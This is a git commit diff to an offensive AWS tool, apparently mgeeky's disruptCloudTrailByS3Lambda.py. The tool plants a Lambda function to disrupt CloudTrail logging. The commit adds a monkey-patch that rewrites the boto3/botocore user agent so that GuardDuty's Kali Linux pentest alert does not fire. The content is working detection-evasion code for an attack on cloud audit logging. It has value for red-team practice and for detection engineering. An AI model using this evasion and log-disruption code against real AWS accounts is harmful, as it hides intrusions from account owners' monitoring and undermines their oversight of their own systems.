Added boto3 patch-up routine avodining GuardDuty kali-sensing while using boto3 library on disruptCloudTrailByS3Lambda.py

This commit is contained in:
mgeeky 2019-03-25 10:08:54 +01:00
parent 168572e3be
commit b33746fda3

View File

@ -36,6 +36,7 @@
#
# Requirements:
# - boto3
# - pytest
#
# Author: Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
#
@ -469,12 +470,38 @@ def parseOptions(argv):
return args
def monkeyPatchBotocoreUserAgent():
'''
This is to avoid triggering GuardDuty 'PenTest:IAMUser/KaliLinux' alerts
Source:
https://www.thesubtlety.com/post/patching-boto3-useragent/
'''
import sys
import boto3
import botocore
try:
from _pytest.monkeypatch import MonkeyPatch
except (ImportError, ModuleNotFoundError) as e:
print('[!] Please install "pytest" first: pip3 install pytest')
print('\tthis will be used to patch-up boto3 library to avoid GuardDuty Kali detection')
sys.exit(0)
monkeypatch = MonkeyPatch()
def my_user_agent(self):
return "Boto3/1.9.89 Python/2.7.12 Linux/4.2.0-42-generic"
monkeypatch.setattr(botocore.session.Session, 'user_agent', my_user_agent)
def main(argv):
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
monkeyPatchBotocoreUserAgent()
dis = CloudTrailDisruptor(
config['region'],
config['access-key'],
@ -500,6 +527,8 @@ def main(argv):
for trail in trails:
Logger._out(f'\t- {trail["Name"]}')
sys.exit(0)
Logger._out('')
Logger.info('Step 2: Create a role to be assumed by planted Lambda')
created_role = dis.create_role(config['role-name'], aws_policy_lambda_assume_role)